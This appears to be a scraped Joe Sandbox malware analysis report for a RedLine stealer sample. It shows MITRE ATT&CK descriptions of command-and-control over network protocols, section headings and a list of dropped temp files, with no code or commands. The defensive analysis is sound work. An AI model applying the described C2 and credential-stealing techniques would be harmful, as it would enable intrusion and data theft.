Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4JL966sxM4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4JL966sxM4.exe.log

C:\Users\user\AppData\Local\Temp\tmp109.tmp

C:\Users\user\AppData\Local\Temp\tmp10A.tmp

C:\Users\user\AppData\Local\Temp\tmp8DB6.tmp

C:\Users\user\AppData\Local\Temp\tmpC3F9.tmp

C:\Users\user\AppData\Local\Temp\tmpC41A.tmp

C:\Users\user\AppData\Local\Temp\tmpC41B.tmp

C:\Users\user\AppData\Local\Temp\tmpC42B.tmp

C:\Users\user\AppData\Local\Temp\tmpC42C.tmp

C:\Users\user\AppData\Local\Temp\tmpC43D.tmp

C:\Users\user\AppData\Local\Temp\tmpC44E.tmp

C:\Users\user\AppData\Local\Temp\tmpC45E.tmp

C:\Users\user\AppData\Local\Temp\tmpC46F.tmp

C:\Users\user\AppData\Local\Temp\tmpE4.tmp

C:\Users\user\AppData\Local\Temp\tmpE5.tmp

Windows Analysis Report
4JL966sxM4.exe